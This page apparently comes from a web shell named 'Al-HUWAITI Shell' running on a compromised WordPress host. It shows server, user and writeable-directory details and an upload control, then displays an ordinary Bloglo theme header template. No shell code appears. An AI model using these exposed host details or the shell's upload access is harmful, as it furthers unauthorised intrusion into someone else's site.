hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : chryzalihi ( 621211)
PHP Version : 8.3.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/c/h/r/chryzalihi/www/wp-content/themes/bloglo/template-parts/header/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/c/h/r/chryzalihi/www/wp-content/themes/bloglo/template-parts/header/header-layout-4.php
<?php
/**
 * The template for displaying header layout 4.
 *
 * @package     Bloglo
 * @author      Peregrine Themes
 * @since       1.0.0
 */

?>

<div class="bloglo-header-container">
	<div class="bloglo-logo-container">
		<div class="bloglo-container">

			<?php
			bloglo_header_logo_template();
			?>

			<?php
			$header_ads_banner_custom_image  = bloglo()->options->get( 'bloglo_header_ads_banner' );
			$header_ads_banner_custom_url    = bloglo()->options->get( 'bloglo_header_ads_banner_url' );
			$header_ads_banner_custom_target = bloglo()->options->get( 'bloglo_header_ads_banner_url_target' );

			$adsbanner = $header_ads_banner_custom_url ? sprintf( '<a href="%1$s" target="' . esc_attr( $header_ads_banner_custom_target ) . '"><img src="%2$s"/></a>', esc_url_raw( $header_ads_banner_custom_url ), esc_url_raw( $header_ads_banner_custom_image ) ) : sprintf( '<img src="%1$s"/>', esc_url_raw( $header_ads_banner_custom_image ) );

			if ( $header_ads_banner_custom_image ) {
				?>

			<!-- Header Image -->
			<div class="bloglo-header-widgets bloglo-header-widgets-two bloglo-header-element">
				<div class="bloglo-header-widget__image bloglo-header-widget bloglo-all">
					<div class="bloglo-widget-wrapper">
						<div class="bloglo-banner-imgads">
							<?php echo wp_kses_post( $adsbanner ); ?>
						</div><!-- .bloglo-banner-imgads -->
					</div>
				</div>
			</div>
			<?php } ?>

			<?php
			do_action( 'bloglo_header_widget_location', array( 'left', 'right' ) );
			?>

			<span class="bloglo-header-element bloglo-mobile-nav">
				<?php bloglo_hamburger( bloglo_option( 'main_nav_mobile_label' ), 'bloglo-primary-nav' ); ?>
				<?php bloglo_main_navigation_template(); ?>
			</span>

		</div><!-- END .bloglo-container -->
	</div><!-- END .bloglo-logo-container -->

	<div class="bloglo-nav-container">
		<div class="bloglo-container">

			<?php
			do_action( 'bloglo_header_widget_location', 'left' );
			bloglo_main_navigation_template();
			do_action( 'bloglo_header_widget_location', 'right' );
			?>

		</div><!-- END .bloglo-container -->
	</div><!-- END .bloglo-nav-container -->
</div><!-- END .bloglo-header-container -->

Al-HUWAITI Shell